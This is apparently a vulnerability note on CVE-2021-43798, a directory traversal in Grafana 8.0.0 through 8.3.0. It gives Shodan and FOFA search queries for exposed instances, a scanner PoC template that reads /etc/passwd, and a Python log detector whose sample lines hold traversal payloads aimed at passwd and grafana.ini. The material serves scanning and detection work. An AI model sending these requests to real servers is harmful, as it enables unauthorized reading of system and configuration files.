Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
shodan title:"Grafana"
fofa app="Grafana"
PoC code [publicly available]
```yaml
id: CVE-2021-43798
info:
  name: Grafana v8.x Arbitrary File Read
  author: z0ne,dhiyaneshDk
  severity: high
  description: |
    Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
    shodan title:"Grafana"
    fofa app="Grafana"
  reference:
    - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43798
set:
  verify_payload: randomLowercase(32)
rules:
  r0:
    request:
      method: GET
      path: /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
```
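The template above checks for the traversal from the scanner's side. As an added example (not part of the PoC or of Grafana itself), the Python below applies the same logic from the defender's side: it reads access-log lines and flags any request whose decoded, normalized path escapes `/public/plugins/<plugin>/`, including percent-encoded and double-encoded `..` segments. The log format and the sample lines are constructed for the example.

```python
"""Flag CVE-2021-43798-style traversal attempts against /public/plugins/<plugin>/ in access logs."""
import re
from urllib.parse import unquote

PLUGIN_PREFIX = "/public/plugins/"

# Constructed sample access-log lines (nginx combined-style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 1820
10.0.0.9 - - [08/Dec/2021:10:01:07 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 2213
10.0.0.9 - - [08/Dec/2021:10:01:09 +0000] "GET /public/plugins/welcome/..%2f..%2f..%2fetc%2fgrafana%2fgrafana.ini HTTP/1.1" 200 4011
10.0.0.9 - - [08/Dec/2021:10:01:11 +0000] "GET /public/plugins/welcome/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 153
10.0.0.7 - - [08/Dec/2021:10:01:15 +0000] "GET /api/health HTTP/1.1" 200 52
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def decode_repeatedly(path, rounds=3):
    """Percent-decode until stable (bounded), so %252e%252e is seen as '..' like %2e%2e is."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_plugin_dir(raw_path):
    """True if the decoded path climbs out of /public/plugins/<plugin>/ via '..' segments."""
    path = decode_repeatedly(raw_path.split("?", 1)[0])
    if not path.startswith(PLUGIN_PREFIX):
        return False
    depth = 0  # 0 = /public/plugins/, 1 = inside the plugin directory
    for seg in path[len(PLUGIN_PREFIX):].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 1:  # left the plugin directory: traversal
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def find_traversal_attempts(log_text):
    """Return (client_ip, status, raw_path) for every log line that escapes the plugin directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and escapes_plugin_dir(m.group("path")):
            hits.append((m.group("ip"), int(m.group("status")), m.group("path")))
    return hits
```

A 200 on a flagged request is the signal to treat as a likely successful read; a 404 still records an attempt worth correlating by client IP.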